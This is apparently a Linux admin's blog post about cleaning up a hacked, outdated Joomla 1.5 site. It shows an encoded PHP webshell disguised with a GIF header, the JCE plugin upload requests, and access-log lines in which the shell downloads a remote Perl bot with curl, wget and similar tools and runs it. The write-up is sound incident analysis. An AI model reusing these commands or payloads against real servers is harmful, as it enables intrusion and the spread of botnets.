Uploaded and executed perl script through old Joomla vulnerability

Written by - 0 comments

Published on - Listed in Hacks Linux Internet CMS


Being a Linux admin running multiple web servers always forcibly puts me in the game hackers vs. systems. It's an endless game without any winners.

“How art thou out of breath when thou hast breath To say to me that thou art out of breath?”
- William Shakespeare

That's definitely a quote which fits such situations. I also have to say that in the past, 99% of all hacks I've had to handle were because of old and unpatched public Content Management Systems, especially old Joomla's. While the end user (who's actually responsible for installing and maintaining the application) mostly doesn't give a damn about updates, it's the sys admin who does the work at the end.

This particular hack occurred a few weeks ago on a web server when I received an alert about the server's load. I also checked the network traffic and the graphs confirmed a great anomaly:

CPU Load
Network

After a few minutes I found the responsible website (thanks to Apache server-status and lsof) which was being attacked and found several files recently modified/uploaded in one of the websites subfolders through the CMS:

ls -ltr | tail
-rw-r--r-- 1 www-data www-data  182880 Mar  9  2013 red_power.jpg
-rw-r--r-- 1 www-data www-data  299881 Mar  9  2013 strandstrukturen.jpg
-rw-r--r-- 1 www-data www-data  185763 Mar  9  2013 nuts_verflssigt.jpg
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 localhost.php
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 iam.gif
-rw-r--r-- 1 www-data www-data    1520 Dec 19 20:08 bkht.gif
-rw-r--r-- 1 www-data www-data    1635 Jan 20 10:29 viar.gif
-rw-r--r-- 1 www-data www-data  207194 Jan 29 03:35 v.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.gif

Let's take a look at food.gif - which is supposed to be a binary file by the way:

cat food.gif
GIF89aGlobex
[...]

Yeah that's what I actually expected to find. It's a "fake" gif which just starts with the GIF header. But because the web server doesn't execute PHP code from a file without a php file extension, this won't harm the system that much. More interesting was food.php, which looks like this:

cat food.php
GIF89aGlobex
JQdLfz1WnQgp84AySJACaggwfY1YlSSWgy6lx68TbSqLIhFMUOARF3JyiEyUrFgN+3koTo67NC0yuqmNqmTBSm0Xh5KHJK/s+z3YahDZsWq4iZROg3mIosoNLxNyrN1elpikTt6Ug9X8QgmjMpdWU85sznkZHbR+Sc2MdBkTNU3tsGIYWcC/SeN54iutZn5j0V5SZMXm1vuArINLi495Ou/3v9VsBJvjAyV2nnXdNcmGgwNM6+jYLLloBWLQu7ZekbEbzzk3C7ayHhnHWl+uzsBBy+J1fHc44PR1FWkh4waOYbyGEu8O7KyRncNPPrDYUnRMjAb+iy6mKHDnBltqiSawdncwPyQUSev2VTMVY1CyDPfCE2TLmHnooypamdbEgCj4Mhwsr4MzTw/Jkz16z1Wuh75uGc6IpaxJFpm9teq1SSq2Pk6/NhO0Yj+wrDXu+Zh9c6mPkexJZlDUTl+6sU0279JvBU7WGEmK74UgvwmDmjQQ1AQAYLNve7OAN9wsGi6aoANfa5/wdqUSPOT2XmE3AMFm/a8E+Q7UXq7JXp5rLwL/Dw==')))); ?>

The content of food.php is actually the same as food.gif. As hackers often do, they encode the whole PHP source code. By decoding the whole stuff, the following source code is revealed:

Well this does look like a small PHP shell script. Let's look at it in the browser:

Small PHP Upload Hack Form

Cute :-).
The steps that followed were causing the huge load.
The hacker not just simply executed some commands. No. The hacker used a method to download a remote perl script and then execute this perl script from this form:

27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:55 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:54 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:08:08 +0100] "GET /images/stories/food.php?rf HTTP/1.1" 200 2455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:10 +0100] "GET /images/stories/food.php?cmd=curl+-C+-+-O+http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:11 +0100] "GET /images/stories/food.php?cmd=wget++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:12 +0100] "GET /images/stories/food.php?cmd=fetch++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:13 +0100] "GET /images/stories/food.php?cmd=lwp-download++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

I manually accessed the URL where the perl bot was downloaded from and this is how the bot script looked like:

Hack Perl Bot

On the system, several hundred processes called "/usr/sbin/httpd" were launched (obviously the process name was faked) which were launching the perl bot. Each instance of the bot attacked several websites on the Internet, trying to do the same exact again: Find Joomla vulnerability and hack the website.

Once I disabled the hacked site, it was calm again. And once again, the responsible website was running this:

        var $RELEASE    = '1.5';
        /** @var string Development Status */
        var $DEV_STATUS = 'Stable';
        /** @var int Sub Release Level */
        var $DEV_LEVEL  = '15';
        /** @var int build Number */
        var $BUILD      = '';
        /** @var string Codename */
        var $CODENAME   = 'Wojmamni Ama Mamni';
        /** @var string Date */
        var $RELDATE    = '05-November-2009';

Honestly, I can't blame the hackers. There are so many pseudo-webmasters out there installing once a CMS and then not taking care about it anymore, it's just too easy to commit a hack.


Add a comment

Show form to leave a comment

Comments (newest first)

No comments yet.

RSS feed

Blog Tags:

  AWS   Android   Ansible   Apache   Apple   Atlassian   BSD   Backup   Bash   Bluecoat   CMS   Chef   Cloud   Coding   Consul   Containers   CouchDB   DB   DNS   Database   Databases   Docker   ELK   Elasticsearch   Filebeat   FreeBSD   Galera   Git   GlusterFS   Grafana   Graphics   HAProxy   HTML   Hacks   Hardware   Icinga   Influx   Internet   Java   KVM   Kibana   Kodi   Kubernetes   LVM   LXC   Linux   Logstash   Mac   Macintosh   Mail   MariaDB   Minio   MongoDB   Monitoring   Multimedia   MySQL   NFS   Nagios   Network   Nginx   OSSEC   OTRS   Office   PGSQL   PHP   Perl   Personal   PostgreSQL   Postgres   PowerDNS   Proxmox   Proxy   Python   Rancher   Rant   Redis   Roundcube   SSL   Samba   Seafile   Security   Shell   SmartOS   Solaris   Surveillance   Systemd   TLS   Tomcat   Ubuntu   Unix   VMWare   VMware   Varnish   Virtualization   Windows   Wireless   Wordpress   Wyse   ZFS   Zoneminder